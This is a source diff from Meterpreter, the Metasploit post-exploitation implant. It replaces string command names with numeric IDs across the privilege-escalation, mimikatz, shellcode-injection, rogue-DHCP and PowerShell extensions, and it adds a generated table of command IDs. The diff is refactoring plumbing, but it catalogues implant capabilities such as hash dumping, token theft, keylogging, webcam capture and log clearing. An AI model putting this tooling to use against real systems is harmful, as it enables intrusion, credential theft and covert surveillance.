+	COMMAND_REQ(COMMAND_ID_LANATTACKS_SET_DHCP_OPTION, request_lanattacks_set_dhcp_option),
-	COMMAND_REQ("lanattacks_stop_dhcp", request_lanattacks_stop_dhcp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_STOP_DHCP, request_lanattacks_stop_dhcp),
-	COMMAND_REQ("lanattacks_dhcp_log", request_lanattacks_dhcp_log),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_DHCP_LOG, request_lanattacks_dhcp_log),
-	COMMAND_REQ("lanattacks_start_tftp", request_lanattacks_start_tftp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_START_TFTP, request_lanattacks_start_tftp),
-	COMMAND_REQ("lanattacks_reset_tftp", request_lanattacks_stop_tftp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_RESET_TFTP, request_lanattacks_stop_tftp),
-	COMMAND_REQ("lanattacks_add_tftp_file", request_lanattacks_add_tftp_file),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_ADD_TFTP_FILE, request_lanattacks_add_tftp_file),
-	COMMAND_REQ("lanattacks_stop_tftp", request_lanattacks_stop_tftp),
+	COMMAND_REQ(COMMAND_ID_LANATTACKS_STOP_TFTP, request_lanattacks_stop_tftp),
 	COMMAND_TERMINATOR
 };
 

c/meterpreter/source/extensions/mimikatz/main.cpp

@@ -86,7 +86,7 @@ extern "C"
 
 	Command customCommands[] =
 	{
-		COMMAND_REQ("mimikatz_custom_command", request_custom_command),
+		COMMAND_REQ(COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND, request_custom_command),
 		COMMAND_TERMINATOR
 	};
 

c/meterpreter/source/extensions/peinjector/peinjector.c

@@ -14,7 +14,7 @@ MetApi* met_api = NULL;
 
 Command customCommands[] =
 {
-	COMMAND_REQ("peinjector_inject_shellcode", request_peinjector_inject_shellcode),
+	COMMAND_REQ(COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE, request_peinjector_inject_shellcode),
 	COMMAND_TERMINATOR
 };
 

c/meterpreter/source/extensions/powershell/powershell.c

@@ -18,10 +18,10 @@ static BOOL gSuccessfullyLoaded = FALSE;
 /*! @brief List of commands that the powershell extension provides. */
 Command customCommands[] =
 {
-	COMMAND_REQ("powershell_execute", request_powershell_execute),
+	COMMAND_REQ(COMMAND_ID_POWERSHELL_EXECUTE, request_powershell_execute),
-	COMMAND_REQ("powershell_shell", request_powershell_shell),
+	COMMAND_REQ(COMMAND_ID_POWERSHELL_SHELL, request_powershell_shell),
-	COMMAND_REQ("powershell_assembly_load", request_powershell_assembly_load),
+	COMMAND_REQ(COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD, request_powershell_assembly_load),
-	COMMAND_REQ("powershell_session_remove", request_powershell_session_remove),
+	COMMAND_REQ(COMMAND_ID_POWERSHELL_SESSION_REMOVE, request_powershell_session_remove),
 	COMMAND_TERMINATOR
 };
 

c/meterpreter/source/extensions/powershell/powershell_bindings.cpp

@@ -25,6 +25,8 @@ VOID MeterpreterInvoke(unsigned int isLocal, unsigned char* input, unsigned int
 	dprintf("[PSH BINDING] Packet header type:    %u", packet.header.type);
 	dprintf("[PSH BINDING] Packet payload length: %u", packet.payloadLength);
 	dprintf("[PSH BINDING] Packet local flag:     %u", isLocal);
+	dprintf("[PSH BINDING] Request ID:            %s", met_api->packet.get_tlv_value_string(&packet, TLV_TYPE_REQUEST_ID));
+	dprintf("[PSH BINDING] Command ID:            %u", met_api->packet.get_tlv_value_uint(&packet, TLV_TYPE_COMMAND_ID));
 
 	met_api->command.handle(gRemote, &packet);
 

c/meterpreter/source/extensions/powershell/powershell_bridge.cpp

@@ -452,13 +452,13 @@ DWORD powershell_channel_interact_notify(Remote *remote, LPVOID entryContext, LP
 {
 	Channel *channel = (Channel*)entryContext;
 	InteractiveShell* shell = (InteractiveShell*)threadContext;
-	DWORD byteCount = shell->output.length() + 1;
+	DWORD byteCount = (shell->output.length() + 1) * sizeof(wchar_t);
 
 	if (shell->output.length() > 1 && shell->wait_handle != NULL)
 	{
 		met_api->lock.acquire(shell->buffer_lock);
-		dprintf("[PSH SHELL] received notification to write");
+		dprintf("[PSH SHELL] received notification to write %S", (wchar_t*)shell->output);
-		DWORD result = met_api->channel.write(channel, remote, NULL, 0, (PUCHAR)(char*)shell->output, byteCount, NULL);
+		DWORD result = met_api->channel.write(channel, remote, NULL, 0, (PUCHAR)(wchar_t*)shell->output, byteCount, NULL);
 		shell->output = "";
 		ResetEvent(shell->wait_handle);
 		met_api->lock.release(shell->buffer_lock);

c/meterpreter/source/extensions/powershell/powershell_runner.h

@@ -1,12 +1,12 @@
 /*!
   * @file powershell_runner.h
-  * @brief This file is generated, do not modify directly.
+  * @brief This file was generated at 04/28/2020 13:38:02 UTC, do not modify directly.
   */
 
  #ifndef _METERPRETER_SOURCE_EXTENSION_POWERSHELL_RUNNER_H
  #define _METERPRETER_SOURCE_EXTENSION_POWERSHELL_RUNNER_H
 
- #define PSHRUNNER_DLL_LEN 58880
+ #define PSHRUNNER_DLL_LEN 64000
 
  extern unsigned char PowerShellRunnerDll[PSHRUNNER_DLL_LEN];
 

c/meterpreter/source/extensions/priv/priv.c

@@ -14,14 +14,14 @@ MetApi* met_api = NULL;
  */
 Command customCommands[] =
 {
-	COMMAND_REQ( "priv_elevate_getsystem", elevate_getsystem ),
+    COMMAND_REQ(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM, elevate_getsystem),
-	COMMAND_REQ( "priv_passwd_get_sam_hashes", request_passwd_get_sam_hashes ),
+    COMMAND_REQ(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES, request_passwd_get_sam_hashes),
-	COMMAND_REQ( "priv_fs_get_file_mace", request_fs_get_file_mace ),
+    COMMAND_REQ(COMMAND_ID_PRIV_FS_GET_FILE_MACE, request_fs_get_file_mace),
-	COMMAND_REQ( "priv_fs_set_file_mace", request_fs_set_file_mace ),
+    COMMAND_REQ(COMMAND_ID_PRIV_FS_SET_FILE_MACE, request_fs_set_file_mace),
-	COMMAND_REQ( "priv_fs_set_file_mace_from_file", request_fs_set_file_mace_from_file ),
+    COMMAND_REQ(COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE, request_fs_set_file_mace_from_file),
-	COMMAND_REQ( "priv_fs_blank_file_mace", request_fs_blank_file_mace ),
+    COMMAND_REQ(COMMAND_ID_PRIV_FS_BLANK_FILE_MACE, request_fs_blank_file_mace),
-	COMMAND_REQ( "priv_fs_blank_directory_mace", request_fs_blank_directory_mace ),
+    COMMAND_REQ(COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE, request_fs_blank_directory_mace),
-	COMMAND_TERMINATOR
+    COMMAND_TERMINATOR
 };
 
 /*!

c/meterpreter/source/extensions/python/Lib/meterpreter/__init__.py

@@ -1,2 +1,2 @@
-__all__ = ['core', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi', 'incognito', 'transport']
+__all__ = ['core', 'command', 'elevate', 'fs', 'tlv', 'kiwi', 'user', 'sys', 'extapi', 'incognito', 'transport']
 

c/meterpreter/source/extensions/python/Lib/meterpreter/command.py

@@ -0,0 +1,210 @@
+# ---------------------------------------------------------------
+# --- THIS CONTENT WAS GENERATED BY A TOOL @ 2020-04-27 04:07:07 UTC
+
+COMMAND_ID_CORE_CHANNEL_CLOSE = 1
+COMMAND_ID_CORE_CHANNEL_EOF = 2
+COMMAND_ID_CORE_CHANNEL_INTERACT = 3
+COMMAND_ID_CORE_CHANNEL_OPEN = 4
+COMMAND_ID_CORE_CHANNEL_READ = 5
+COMMAND_ID_CORE_CHANNEL_SEEK = 6
+COMMAND_ID_CORE_CHANNEL_TELL = 7
+COMMAND_ID_CORE_CHANNEL_WRITE = 8
+COMMAND_ID_CORE_CONSOLE_WRITE = 9
+COMMAND_ID_CORE_ENUMEXTCMD = 10
+COMMAND_ID_CORE_GET_SESSION_GUID = 11
+COMMAND_ID_CORE_LOADLIB = 12
+COMMAND_ID_CORE_MACHINE_ID = 13
+COMMAND_ID_CORE_MIGRATE = 14
+COMMAND_ID_CORE_NATIVE_ARCH = 15
+COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION = 16
+COMMAND_ID_CORE_PATCH_URL = 17
+COMMAND_ID_CORE_PIVOT_ADD = 18
+COMMAND_ID_CORE_PIVOT_REMOVE = 19
+COMMAND_ID_CORE_PIVOT_SESSION_DIED = 20
+COMMAND_ID_CORE_SET_SESSION_GUID = 21
+COMMAND_ID_CORE_SET_UUID = 22
+COMMAND_ID_CORE_SHUTDOWN = 23
+COMMAND_ID_CORE_TRANSPORT_ADD = 24
+COMMAND_ID_CORE_TRANSPORT_CHANGE = 25
+COMMAND_ID_CORE_TRANSPORT_GETCERTHASH = 26
+COMMAND_ID_CORE_TRANSPORT_LIST = 27
+COMMAND_ID_CORE_TRANSPORT_NEXT = 28
+COMMAND_ID_CORE_TRANSPORT_PREV = 29
+COMMAND_ID_CORE_TRANSPORT_REMOVE = 30
+COMMAND_ID_CORE_TRANSPORT_SETCERTHASH = 31
+COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS = 32
+COMMAND_ID_CORE_TRANSPORT_SLEEP = 33
+COMMAND_ID_STDAPI_FS_CHDIR = 1001
+COMMAND_ID_STDAPI_FS_CHMOD = 1002
+COMMAND_ID_STDAPI_FS_DELETE_DIR = 1003
+COMMAND_ID_STDAPI_FS_DELETE_FILE = 1004
+COMMAND_ID_STDAPI_FS_FILE_COPY = 1005
+COMMAND_ID_STDAPI_FS_FILE_EXPAND_PATH = 1006
+COMMAND_ID_STDAPI_FS_FILE_MOVE = 1007
+COMMAND_ID_STDAPI_FS_GETWD = 1008
+COMMAND_ID_STDAPI_FS_LS = 1009
+COMMAND_ID_STDAPI_FS_MD5 = 1010
+COMMAND_ID_STDAPI_FS_MKDIR = 1011
+COMMAND_ID_STDAPI_FS_MOUNT_SHOW = 1012
+COMMAND_ID_STDAPI_FS_SEARCH = 1013
+COMMAND_ID_STDAPI_FS_SEPARATOR = 1014
+COMMAND_ID_STDAPI_FS_SHA1 = 1015
+COMMAND_ID_STDAPI_FS_STAT = 1016
+COMMAND_ID_STDAPI_NET_CONFIG_ADD_ROUTE = 1017
+COMMAND_ID_STDAPI_NET_CONFIG_GET_ARP_TABLE = 1018
+COMMAND_ID_STDAPI_NET_CONFIG_GET_INTERFACES = 1019
+COMMAND_ID_STDAPI_NET_CONFIG_GET_NETSTAT = 1020
+COMMAND_ID_STDAPI_NET_CONFIG_GET_PROXY = 1021
+COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES = 1022
+COMMAND_ID_STDAPI_NET_CONFIG_REMOVE_ROUTE = 1023
+COMMAND_ID_STDAPI_NET_RESOLVE_HOST = 1024
+COMMAND_ID_STDAPI_NET_RESOLVE_HOSTS = 1025
+COMMAND_ID_STDAPI_NET_SOCKET_TCP_SHUTDOWN = 1026
+COMMAND_ID_STDAPI_NET_TCP_CHANNEL_OPEN = 1027
+COMMAND_ID_STDAPI_RAILGUN_API = 1028
+COMMAND_ID_STDAPI_RAILGUN_API_MULTI = 1029
+COMMAND_ID_STDAPI_RAILGUN_MEMREAD = 1030
+COMMAND_ID_STDAPI_RAILGUN_MEMWRITE = 1031
+COMMAND_ID_STDAPI_REGISTRY_CHECK_KEY_EXISTS = 1032
+COMMAND_ID_STDAPI_REGISTRY_CLOSE_KEY = 1033
+COMMAND_ID_STDAPI_REGISTRY_CREATE_KEY = 1034
+COMMAND_ID_STDAPI_REGISTRY_DELETE_KEY = 1035
+COMMAND_ID_STDAPI_REGISTRY_DELETE_VALUE = 1036
+COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY = 1037
+COMMAND_ID_STDAPI_REGISTRY_ENUM_KEY_DIRECT = 1038
+COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE = 1039
+COMMAND_ID_STDAPI_REGISTRY_ENUM_VALUE_DIRECT = 1040
+COMMAND_ID_STDAPI_REGISTRY_LOAD_KEY = 1041
+COMMAND_ID_STDAPI_REGISTRY_OPEN_KEY = 1042
+COMMAND_ID_STDAPI_REGISTRY_OPEN_REMOTE_KEY = 1043
+COMMAND_ID_STDAPI_REGISTRY_QUERY_CLASS = 1044
+COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE = 1045
+COMMAND_ID_STDAPI_REGISTRY_QUERY_VALUE_DIRECT = 1046
+COMMAND_ID_STDAPI_REGISTRY_SET_VALUE = 1047
+COMMAND_ID_STDAPI_REGISTRY_SET_VALUE_DIRECT = 1048
+COMMAND_ID_STDAPI_REGISTRY_UNLOAD_KEY = 1049
+COMMAND_ID_STDAPI_SYS_CONFIG_DRIVER_LIST = 1050
+COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN = 1051
+COMMAND_ID_STDAPI_SYS_CONFIG_GETENV = 1052
+COMMAND_ID_STDAPI_SYS_CONFIG_GETPRIVS = 1053
+COMMAND_ID_STDAPI_SYS_CONFIG_GETSID = 1054
+COMMAND_ID_STDAPI_SYS_CONFIG_GETUID = 1055
+COMMAND_ID_STDAPI_SYS_CONFIG_LOCALTIME = 1056
+COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF = 1057
+COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN = 1058
+COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO = 1059
+COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR = 1060
+COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE = 1061
+COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS = 1062
+COMMAND_ID_STDAPI_SYS_EVENTLOG_OLDEST = 1063
+COMMAND_ID_STDAPI_SYS_EVENTLOG_OPEN = 1064
+COMMAND_ID_STDAPI_SYS_EVENTLOG_READ = 1065
+COMMAND_ID_STDAPI_SYS_POWER_EXITWINDOWS = 1066
+COMMAND_ID_STDAPI_SYS_PROCESS_ATTACH = 1067
+COMMAND_ID_STDAPI_SYS_PROCESS_CLOSE = 1068
+COMMAND_ID_STDAPI_SYS_PROCESS_EXECUTE = 1069
+COMMAND_ID_STDAPI_SYS_PROCESS_GET_INFO = 1070
+COMMAND_ID_STDAPI_SYS_PROCESS_GET_PROCESSES = 1071
+COMMAND_ID_STDAPI_SYS_PROCESS_GETPID = 1072
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_IMAGES = 1073
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_GET_PROC_ADDRESS = 1074
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_LOAD = 1075
+COMMAND_ID_STDAPI_SYS_PROCESS_IMAGE_UNLOAD = 1076
+COMMAND_ID_STDAPI_SYS_PROCESS_KILL = 1077
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_ALLOCATE = 1078
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_FREE = 1079
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK = 1080
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT = 1081
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_QUERY = 1082
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_READ = 1083
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK = 1084
+COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_WRITE = 1085
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CLOSE = 1086
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_CREATE = 1087
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_GET_THREADS = 1088
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN = 1089
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_QUERY_REGS = 1090
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_RESUME = 1091
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SET_REGS = 1092
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_SUSPEND = 1093
+COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_TERMINATE = 1094
+COMMAND_ID_STDAPI_SYS_PROCESS_WAIT = 1095
+COMMAND_ID_STDAPI_UI_DESKTOP_ENUM = 1096
+COMMAND_ID_STDAPI_UI_DESKTOP_GET = 1097
+COMMAND_ID_STDAPI_UI_DESKTOP_SCREENSHOT = 1098
+COMMAND_ID_STDAPI_UI_DESKTOP_SET = 1099
+COMMAND_ID_STDAPI_UI_ENABLE_KEYBOARD = 1100
+COMMAND_ID_STDAPI_UI_ENABLE_MOUSE = 1101
+COMMAND_ID_STDAPI_UI_GET_IDLE_TIME = 1102
+COMMAND_ID_STDAPI_UI_GET_KEYS_UTF8 = 1103
+COMMAND_ID_STDAPI_UI_SEND_KEYEVENT = 1104
+COMMAND_ID_STDAPI_UI_SEND_KEYS = 1105
+COMMAND_ID_STDAPI_UI_SEND_MOUSE = 1106
+COMMAND_ID_STDAPI_UI_START_KEYSCAN = 1107
+COMMAND_ID_STDAPI_UI_STOP_KEYSCAN = 1108
+COMMAND_ID_STDAPI_UI_UNLOCK_DESKTOP = 1109
+COMMAND_ID_STDAPI_WEBCAM_AUDIO_RECORD = 1110
+COMMAND_ID_STDAPI_WEBCAM_GET_FRAME = 1111
+COMMAND_ID_STDAPI_WEBCAM_LIST = 1112
+COMMAND_ID_STDAPI_WEBCAM_START = 1113
+COMMAND_ID_STDAPI_WEBCAM_STOP = 1114
+COMMAND_ID_PRIV_ELEVATE_GETSYSTEM = 2001
+COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE = 2002
+COMMAND_ID_PRIV_FS_BLANK_FILE_MACE = 2003
+COMMAND_ID_PRIV_FS_GET_FILE_MACE = 2004
+COMMAND_ID_PRIV_FS_SET_FILE_MACE = 2005
+COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE = 2006
+COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES = 2007
+COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY = 3001
+COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA = 3002
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP = 3003
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE = 3004
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE = 3005
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME = 3006
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START = 3007
+COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP = 3008
+COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA = 3009
+COMMAND_ID_EXTAPI_NTDS_PARSE = 3010
+COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY = 3011
+COMMAND_ID_EXTAPI_SERVICE_CONTROL = 3012
+COMMAND_ID_EXTAPI_SERVICE_ENUM = 3013
+COMMAND_ID_EXTAPI_SERVICE_QUERY = 3014
+COMMAND_ID_EXTAPI_WINDOW_ENUM = 3015
+COMMAND_ID_EXTAPI_WMI_QUERY = 3016
+COMMAND_ID_SNIFFER_CAPTURE_DUMP = 4001
+COMMAND_ID_SNIFFER_CAPTURE_DUMP_READ = 4002
+COMMAND_ID_SNIFFER_CAPTURE_RELEASE = 4003
+COMMAND_ID_SNIFFER_CAPTURE_START = 4004
+COMMAND_ID_SNIFFER_CAPTURE_STATS = 4005
+COMMAND_ID_SNIFFER_CAPTURE_STOP = 4006
+COMMAND_ID_SNIFFER_INTERFACES = 4007
+COMMAND_ID_WINPMEM_DUMP_RAM = 7001
+COMMAND_ID_KIWI_EXEC_CMD = 8001
+COMMAND_ID_UNHOOK_PE = 10001
+COMMAND_ID_ESPIA_IMAGE_GET_DEV_SCREEN = 11001
+COMMAND_ID_INCOGNITO_ADD_GROUP_USER = 12001
+COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER = 12002
+COMMAND_ID_INCOGNITO_ADD_USER = 12003
+COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN = 12004
+COMMAND_ID_INCOGNITO_LIST_TOKENS = 12005
+COMMAND_ID_INCOGNITO_SNARF_HASHES = 12006
+COMMAND_ID_PYTHON_EXECUTE = 13001
+COMMAND_ID_PYTHON_RESET = 13002
+COMMAND_ID_POWERSHELL_ASSEMBLY_LOAD = 14001
+COMMAND_ID_POWERSHELL_EXECUTE = 14002
+COMMAND_ID_POWERSHELL_SESSION_REMOVE = 14003
+COMMAND_ID_POWERSHELL_SHELL = 14004
+COMMAND_ID_LANATTACKS_ADD_TFTP_FILE = 15001
+COMMAND_ID_LANATTACKS_DHCP_LOG = 15002
+COMMAND_ID_LANATTACKS_RESET_DHCP = 15003
+COMMAND_ID_LANATTACKS_RESET_TFTP = 15004
+COMMAND_ID_LANATTACKS_SET_DHCP_OPTION = 15005
+COMMAND_ID_LANATTACKS_START_DHCP = 15006
+COMMAND_ID_LANATTACKS_START_TFTP = 15007
+COMMAND_ID_LANATTACKS_STOP_DHCP = 15008
+COMMAND_ID_LANATTACKS_STOP_TFTP = 15009
+COMMAND_ID_PEINJECTOR_INJECT_SHELLCODE = 16001
+COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND = 17001
+
+# ---------------------------------------------------------------
+

c/meterpreter/source/extensions/python/Lib/meterpreter/core.py

@@ -63,7 +63,7 @@ TLV_TEMP       = 60000
 # TLV Specific Types
 #
 TLV_TYPE_ANY                   = TLV_META_TYPE_NONE    | 0
-TLV_TYPE_METHOD                = TLV_META_TYPE_STRING  | 1
+TLV_TYPE_COMMAND_ID            = TLV_META_TYPE_UINT    | 1
 TLV_TYPE_REQUEST_ID            = TLV_META_TYPE_STRING  | 2
 TLV_TYPE_EXCEPTION             = TLV_META_TYPE_GROUP   | 3
 TLV_TYPE_RESULT                = TLV_META_TYPE_UINT    | 4
@@ -197,19 +197,21 @@ def validate_binding(required):
   This function returns the correct binding name to call."""
 
   # assume all core commands are valid
-  if required[:5] == 'core_':
+  if required < 1000:
     required = 'meterpreter_core'
+  else:
+    required = 'command_{0}'.format(required)
 
   if not required in set(dir(meterpreter_bindings)):
-    raise Exception('Missing bindings: {0}'.format(required))
+    raise Exception('Missing bindings: {0} (is a dependent extension not yet loaded?)'.format(required))
 
   return required
 
-def invoke_meterpreter(method, is_local, tlv = ""):
+def invoke_meterpreter(command_id, is_local, tlv = ""):
-  binding = validate_binding(method)
+  binding = validate_binding(command_id)
 
   header = struct.pack('>I', PACKET_TYPE_REQUEST)
-  header += tlv_pack(TLV_TYPE_METHOD, method)
+  header += tlv_pack(TLV_TYPE_COMMAND_ID, command_id)
   header += tlv_pack(TLV_TYPE_REQUEST_ID, 0)
   # add a leading 4-byte "zero" for the xor-key, 16 byte null guid, 4 byte encryption flag
   req = '\x00' * 24

c/meterpreter/source/extensions/python/Lib/meterpreter/elevate.py

@@ -2,19 +2,20 @@ import meterpreter_bindings
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 # We only support technique 1 (as it's the only one that doesn't require DLLs)
 def getsystem():
   tlv = tlv_pack(TLV_TYPE_ELEVATE_TECHNIQUE, 1)
   tlv += tlv_pack(TLV_TYPE_ELEVATE_SERVICE_NAME, rnd_string(5))
-  resp = invoke_meterpreter('priv_elevate_getsystem', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM, True, tlv)
   if resp == None:
     return False
 
   return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
 
 def rev2self():
-  resp = invoke_meterpreter('stdapi_sys_config_rev2self', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF, True)
   if resp == None:
     return False
 
@@ -22,14 +23,14 @@ def rev2self():
 
 def steal_token(pid):
   tlv = tlv_pack(TLV_TYPE_PID, pid)
-  resp = invoke_meterpreter('stdapi_sys_config_steal_token', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN, True, tlv)
   if resp == None:
     return False
 
   return packet_get_tlv(resp, TLV_TYPE_RESULT)['value'] == 0
 
 def drop_token():
-  resp = invoke_meterpreter('stdapi_sys_config_drop_token', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN, True)
   if resp == None:
     return False
 

c/meterpreter/source/extensions/python/Lib/meterpreter/extapi/adsi.py

@@ -1,26 +1,8 @@
 import meterpreter_bindings
 
 from meterpreter.core import *
-
+from meterpreter.tlv import *
-TLV_EXTAPI_EXTENSION = 20000
+from meterpreter.command import *
-
-TLV_TYPE_EXTAPI_ADSI_DOMAIN       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 54)
-TLV_TYPE_EXTAPI_ADSI_FILTER       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 55)
-TLV_TYPE_EXTAPI_ADSI_FIELD        = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 56)
-TLV_TYPE_EXTAPI_ADSI_RESULT       = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 57)
-TLV_TYPE_EXTAPI_ADSI_MAXRESULTS   = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 58)
-TLV_TYPE_EXTAPI_ADSI_PAGESIZE     = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 59)
-TLV_TYPE_EXTAPI_ADSI_ARRAY        = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 60)
-TLV_TYPE_EXTAPI_ADSI_STRING       = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 61)
-TLV_TYPE_EXTAPI_ADSI_NUMBER       = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 62)
-TLV_TYPE_EXTAPI_ADSI_BIGNUMBER    = TLV_META_TYPE_QWORD   | (TLV_EXTAPI_EXTENSION + 63)
-TLV_TYPE_EXTAPI_ADSI_BOOL         = TLV_META_TYPE_BOOL    | (TLV_EXTAPI_EXTENSION + 64)
-TLV_TYPE_EXTAPI_ADSI_RAW          = TLV_META_TYPE_RAW     | (TLV_EXTAPI_EXTENSION + 65)
-TLV_TYPE_EXTAPI_ADSI_PATH         = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 66)
-TLV_TYPE_EXTAPI_ADSI_PATH_VOL     = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 67)
-TLV_TYPE_EXTAPI_ADSI_PATH_PATH    = TLV_META_TYPE_STRING  | (TLV_EXTAPI_EXTENSION + 68)
-TLV_TYPE_EXTAPI_ADSI_PATH_TYPE    = TLV_META_TYPE_UINT    | (TLV_EXTAPI_EXTENSION + 69)
-TLV_TYPE_EXTAPI_ADSI_DN           = TLV_META_TYPE_GROUP   | (TLV_EXTAPI_EXTENSION + 70)
 
 def enum_dcs(domain_name, max_results = None, page_size = None):
   query_filter = '(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
@@ -60,7 +42,7 @@ def domain_query(domain_name, query_filter, fields, max_results = None, page_siz
   for f in fields:
     tlv += tlv_pack(TLV_TYPE_EXTAPI_ADSI_FIELD, f)
 
-  resp = invoke_meterpreter('extapi_adsi_domain_query', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY, True, tlv)
   if resp == None:
     return None
 

c/meterpreter/source/extensions/python/Lib/meterpreter/fs.py

@@ -2,9 +2,10 @@ import meterpreter_bindings
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 def show_mount():
-  resp = invoke_meterpreter('stdapi_fs_mount_show', True)
+  resp = invoke_meterpreter(COMMAND_ID_STDAPI_FS_MOUNT_SHOW, True)
   if resp == None:
       return False
 

c/meterpreter/source/extensions/python/Lib/meterpreter/incognito.py

@@ -2,6 +2,7 @@ import meterpreter_bindings
 
 from meterpreter.core import *
 from meterpreter.tlv import *
+from meterpreter.command import *
 
 INCOGNITO_NO_TOKENS = 'No tokens available\n'
 
@@ -13,7 +14,7 @@ def list_group_tokens():
 
 def __list_tokens_internal(order):
   tlv = tlv_pack(TLV_TYPE_INCOGNITO_LIST_TOKENS_TOKEN_ORDER, order)
-  resp = invoke_meterpreter('incognito_list_tokens', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_INCOGNITO_LIST_TOKENS, True, tlv)
 
   if resp == None:
     return None
@@ -30,7 +31,7 @@ def __list_tokens_internal(order):
 
 def impersonate(user):
   tlv = tlv_pack(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, user)
-  resp = invoke_meterpreter('incognito_impersonate_token', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN, True, tlv)
 
   if resp == None:
     return False
@@ -39,7 +40,7 @@ def impersonate(user):
 
 def snarf_hashes(server):
   tlv = tlv_pack(TLV_TYPE_INCOGNITO_SERVERNAME, server)
-  resp = invoke_meterpreter('incognito_snarf_hashes', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_INCOGNITO_SNARF_HASHES, True, tlv)
 
   if resp == None:
     return False
@@ -51,7 +52,7 @@ def add_user(server, username, password):
   tlv += tlv_pack(TLV_TYPE_INCOGNITO_USERNAME, username)
   tlv += tlv_pack(TLV_TYPE_INCOGNITO_PASSWORD, password)
 
-  resp = invoke_meterpreter('incognito_add_user', True, tlv)
+  resp = invoke_meterpreter(COMMAND_ID_INCOGNITO_ADD_USER, True, tlv)
 
   if resp == None:
